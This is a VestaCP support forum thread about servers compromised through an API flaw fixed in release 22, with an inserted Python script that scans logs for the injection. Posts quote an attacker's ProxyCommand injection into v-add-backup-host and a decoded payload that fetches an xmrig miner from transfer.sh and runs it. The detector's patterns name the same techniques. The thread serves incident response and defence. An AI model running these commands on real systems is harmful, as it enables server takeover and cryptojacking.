Vesta Control Panel - Forum

have been HACKED ! by xaxaxa.eu

General questions about VestaCP
sauvegardezvous99
Posts: 25
Joined: Mon Nov 24, 2014 11:48 pm

Re: have been HACKED ! by xaxaxa.eu

Post by sauvegardezvous99 » Tue Jun 26, 2018 1:39 pm

ScIT wrote: ↑
Tue Jun 26, 2018 3:58 am
Can you send more information about the creation time of the files? The Vesta dev team has patched this issue with release 22; for further investigation we need to be sure that the infection was after the upgrade to 22.
To answer your question, I was indeed on version 20.

[xxx@two /]# cd /usr/local/vesta/bin
[xxx@two bin]# ./v-list-sys-vesta-updates
PKG          VER    REL  ARCH    UPDT  DATE
---          ---    ---  ----    ----  ----
vesta        0.9.8  20   x86_64  yes   2018-04-09
vesta-php    0.9.8  17   x86_64  yes   2016-11-26
vesta-nginx  0.9.8  17   x86_64  yes   2016-11-26

sauvegardezvous99
Posts: 25
Joined: Mon Nov 24, 2014 11:48 pm

Re: have been HACKED ! by xaxaxa.eu

Post by sauvegardezvous99 » Tue Jun 26, 2018 1:43 pm

You're up to date, good so far. Now you need to clean your server. My point of view: do not trust an infected server anymore. Better to install a new one and migrate the users there.
As you said, I've shut down the hacked server and manually moved all users to another one.
No chance to take.

Thank you for all your great advice.

deanhills
Posts: 48
Joined: Tue Aug 09, 2016 7:13 am

Os: CentOS 6x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by deanhills » Tue Jun 26, 2018 10:04 pm

ScIT wrote: ↑
Tue Jun 26, 2018 3:58 am
Can you send more information about the creation time of the files? The Vesta dev team has patched this issue with release 22; for further investigation we need to be sure that the infection was after the upgrade to 22.
I'm going to wait for the outcome of your research and am looking forward to the results before I do anything. My panel is on automatic upgrades; I'm sure most of the user panels are that way.

Only thing that worried me tonight was the dead.file in my file directory and there was an IP from Korea trying to log in with SSH - I've since banned his IP with my Fail2Ban - hopefully there won't be more to follow.

Once I restarted VestaCP tonight everything was fine and when I did research at UNIX about the dead.file it didn't look as though the issue belonged to VestaCP. I'm not sure about that though.

Only bad part was when I mentioned this to my VPS Host they were worried and thought immediately I was hacked because of this thread at VestaCP. I wasn't hacked.

We'll be grateful if you could respond positively from the Admin of VestaCP so our VPS Hosts can have peace of mind about our VestaCP installations. Thanks.

ram108
Posts: 34
Joined: Fri Jul 19, 2013 9:59 pm

Os: Ubuntu 17x
Web: nginx + php-fpm
Re: have been HACKED ! by xaxaxa.eu

Post by ram108 » Thu Jun 28, 2018 7:02 pm

Spheerys wrote: ↑
Tue Jun 26, 2018 7:21 am
Look on this file or similar : /etc/cron/d/php5
It's calling another file : /usr/lib/php5/sessionclean
If you are sure what you are doing, delete them both.
sessionclean is a part of php package and should not be removed.

Spheerys
Posts: 225
Joined: Tue Dec 29, 2015 12:36 pm

Os: Debian 7x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by Spheerys » Thu Jun 28, 2018 8:58 pm

You are right! I will edit my post. Thanks!

tombabomba
Posts: 1
Joined: Sat Jun 30, 2018 11:40 am

Os: CentOS 6x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by tombabomba » Sat Jun 30, 2018 11:45 am

I got hacked as well. 3 Vesta servers, only 2 of them got hacked.

Initially, I didn't know what was going on, so I removed execution permission from /tmp, and partially stopped it.
Later I found this forum and applied the updates.

Thanks Vesta team for your help and quick release of patch.

cybersa
Posts: 2
Joined: Mon Jul 02, 2018 10:15 am

Os: Ubuntu 15x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by cybersa » Mon Jul 02, 2018 10:26 am

My website was hacked on Jun 22 around 11:10 PM UTC. My server got upgraded to the latest version automatically, but I think the server was infected before that.

I have removed the miner file under /tmp/xmrig. Then I analyzed the server logs to find the root cause and found the following things:

1. No new user (sysroot) has been created as mentioned in the first post's script.
2. No new cron jobs have been added.
3. xmrig was run with this cmd:

./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=1 --donate-level=1 --background
4. Found this log in /var/log/vesta/error.log

2018-06-22 23:13:28 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]
Decoded version:

cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/eyz4z/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null
My OS: Ubuntu 16

FYI
@ScIT

semasping
Posts: 2
Joined: Wed Jul 18, 2018 8:24 pm

Os: Ubuntu 15x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by semasping » Wed Jul 18, 2018 8:29 pm

+1 for the last post.
I have the same code in /var/log/vesta/error.log

2018-06-23 04:01:01 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]

./v-list-sys-vesta-updates
PKG                VER    REL  ARCH   UPDT  DATE
---                ---    ---  ----   ----  ----
vesta              0.9.8  22   amd64  yes   2018-06-25
vesta-php          0.9.8  22   amd64  yes   2018-06-29
vesta-nginx        0.9.8  22   amd64  yes   2018-06-29
vesta-ioncube      0.9.8  21   amd64  yes   2018-06-29
vesta-softaculous  0.9.8  21   amd64  yes   2018-06-29


ScIT
Support team
Posts: 617
Joined: Mon Feb 23, 2015 4:13 pm

Os: Ubuntu 17x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by ScIT » Thu Jul 19, 2018 6:52 am

semasping wrote: ↑
Wed Jul 18, 2018 8:29 pm
+1 for the last post.
I have the same code in /var/log/vesta/error.log

2018-06-23 04:01:01 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]

./v-list-sys-vesta-updates
PKG                VER    REL  ARCH   UPDT  DATE
---                ---    ---  ----   ----  ----
vesta              0.9.8  22   amd64  yes   2018-06-25
vesta-php          0.9.8  22   amd64  yes   2018-06-29
vesta-nginx        0.9.8  22   amd64  yes   2018-06-29
vesta-ioncube      0.9.8  21   amd64  yes   2018-06-29
vesta-softaculous  0.9.8  21   amd64  yes   2018-06-29

Still the same question: was the infection before or after the update to release 22?

There was a security issue in the API, so it was possible to run API commands like v-add-backup-host. The issue is resolved with R22. If your system is infected, the safest way is to reinstall the server and migrate user data.
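Two posts above give a defender the concrete facts to work with: cybersa's post shows the /var/log/vesta/error.log line recording a v-add-backup-host call whose host argument carried an -oProxyCommand option and a base64-decoded shell pipeline, and ScIT's reply explains that the API flaw fixed in release 22 allowed that command to be invoked. The Python script below is an added example, not code from this thread or from the VestaCP project. It parses log lines of that shape, flags the two indicators, decodes the embedded payload so an analyst can read it, and shows the kind of strict hostname check that rejects option-like values before they could reach sftp/ssh. The sample log lines and the base64 payload are constructed for the example; the real payload in the thread was redacted.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Shape of the vesta error.log lines quoted in the thread:
#   "<timestamp> <v-command>  <quoted args> [Error N]"
# The "[Error N]" suffix is optional so lines without it still parse.
LOG_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<cmd>v-[a-z0-9-]+)\s+(?P<args>.*?)(?: \[Error (?P<err>\d+)\])?$"
)

# Indicators that should never occur inside the arguments of a backup-host command.
INDICATORS = {
    # An ssh/sftp option smuggled in through the host field.
    "ssh-option-injection": re.compile(
        r"-o\s*(ProxyCommand|LocalCommand|PermitLocalCommand)", re.I
    ),
    # A decode-then-execute pipeline.
    "decode-and-execute": re.compile(r"base64\s+(-d|--decode)\s*\|\s*(ba)?sh"),
}

# A backup host may only be a hostname or IPv4 literal: letters, digits, dots and
# dashes, never a leading '-' (ssh would treat it as an option), quotes or spaces.
SAFE_HOST = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def is_safe_host(value: str) -> bool:
    """Strict allow-list check to apply before a host value is passed to sftp/ssh."""
    return SAFE_HOST.fullmatch(value) is not None


@dataclass
class Finding:
    timestamp: str
    command: str
    indicators: List[str]
    decoded: Optional[str] = None


def decode_embedded_base64(args: str) -> Optional[str]:
    """Decode the payload between 'echo ' and '|base64' so the analyst can read it."""
    m = re.search(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64", args)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def scan_line(line: str) -> Optional[Finding]:
    """Return a Finding when a log line carries any of the indicators, else None."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    args = m.group("args")
    hits = [name for name, rx in INDICATORS.items() if rx.search(args)]
    if not hits:
        return None
    return Finding(m.group("ts"), m.group("cmd"), hits, decode_embedded_base64(args))


def scan_log(text: str) -> List[Finding]:
    return [f for f in (scan_line(ln) for ln in text.splitlines()) if f]


# Constructed sample data (hypothetical): a benign backup-host call, one call shaped
# like the injected line from the thread but with a harmless constructed payload,
# and an unrelated command.
PAYLOAD_B64 = base64.b64encode(b"echo constructed-sample-payload").decode()
SAMPLE_LOG = "\n".join([
    "2018-06-22 23:10:02 v-add-backup-host  'sftp' 'backup.example.org' 'vestabackup' '******'",
    "2018-06-22 23:13:28 v-add-backup-host  'sftp' 'xx' "
    f"'\"-oProxyCommand=echo {PAYLOAD_B64}|base64 -d|sh\" x' '******' [Error 15]",
    "2018-06-22 23:20:11 v-list-user  'admin' [Error 3]",
])

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.command}: {', '.join(f.indicators)}")
        if f.decoded:
            print("  decoded payload:", f.decoded)
    for host in ("backup.example.org", '"-oProxyCommand=x" x'):
        print(f"host {host!r} accepted: {is_safe_host(host)}")
```

Run it against a real file with `scan_log(open("/var/log/vesta/error.log").read())`; anything it returns deserves the same treatment ScIT recommends for a confirmed infection. The `is_safe_host` check is the input-validation side of the same problem: a host field that cannot start with `-` or contain quotes or whitespace cannot be turned into an ssh option.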

semasping
Posts: 2
Joined: Wed Jul 18, 2018 8:24 pm

Os: Ubuntu 15x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by semasping » Fri Jul 20, 2018 10:40 am

ScIT wrote: ↑
Thu Jul 19, 2018 6:52 am
semasping wrote: ↑
Wed Jul 18, 2018 8:29 pm
+1 for the last post.
I have the same code in /var/log/vesta/error.log

2018-06-23 04:01:01 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]

./v-list-sys-vesta-updates
PKG                VER    REL  ARCH   UPDT  DATE
---                ---    ---  ----   ----  ----
vesta              0.9.8  22   amd64  yes   2018-06-25
vesta-php          0.9.8  22   amd64  yes   2018-06-29
vesta-nginx        0.9.8  22   amd64  yes   2018-06-29
vesta-ioncube      0.9.8  21   amd64  yes   2018-06-29
vesta-softaculous  0.9.8  21   amd64  yes   2018-06-29

Still the same question: was the infection before or after the update to release 22?

There was a security issue in the API, so it was possible to run API commands like v-add-backup-host. The issue is resolved with R22. If your system is infected, the safest way is to reinstall the server and migrate user data.
The system was infected before the update.

